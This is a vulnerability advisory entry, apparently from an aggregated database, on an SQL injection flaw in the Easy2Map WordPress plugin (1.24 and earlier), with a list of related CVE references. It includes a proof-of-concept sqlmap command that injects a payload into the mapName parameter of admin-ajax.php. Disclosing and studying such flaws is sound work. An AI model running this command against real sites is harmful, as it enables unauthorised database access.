Lucene search
Larry W. CashdollarWPVDB-ID:49135A0C-34B4-4EE2-B2AD-E4F646619AC4HistoryJun 08, 2015 - 12:00 a.m.
Easy2Map <= 1.24 - SQL Injection
2015-06-0800:00:00
Larry W. Cashdollar
wpscan.com
11
0.016 Low
EPSS
Percentile
87.3%
The Function.php file uses sprintf() to format queries being sent to the database, this doesn’t provide proper sanitisation of user input or properly parameterises the query.
PoC
$ sqlmap -u ‘http://www.example.com/wp-admin/admin-ajax.php’ --data=“mapID=11&mapName;='+or+1%3D%3D1%3B&action;=e2m_img_save_map_name” --cookie=COOKIE HERE --level=5 --risk=3
Related
packetstorm
packetstorm
WordPress easy2map 1.24 SQL Injection
2015-07-03 00:00:00
wpexploit
wpexploit
Easy2Map <= 1.24 - SQL Injection
2015-06-08 00:00:00
patchstack
patchstack
WordPress Easy2Map Plugin 1.24 - SQL Injection
2015-07-08 00:00:00
cve
cve
CVE-2015-4614
2015-07-08 16:59:00
CVE-2015-4616
2015-07-08 16:59:02
cvelist
cvelist
CVE-2015-4614
2015-07-08 16:00:00
CVE-2015-4616
2015-07-08 16:00:00
prion
prion
Directory traversal
2015-07-08 16:59:00
Sql injection
2015-07-08 16:59:00
zdt
zdt
WordPress Easy2Map Plugin 1.24 - SQL Injection Vulnerability
2015-07-09 00:00:00
nvd
nvd
CVE-2015-4614
2015-07-08 16:59:00
CVE-2015-4616
2015-07-08 16:59:02
securityvulns
securityvulns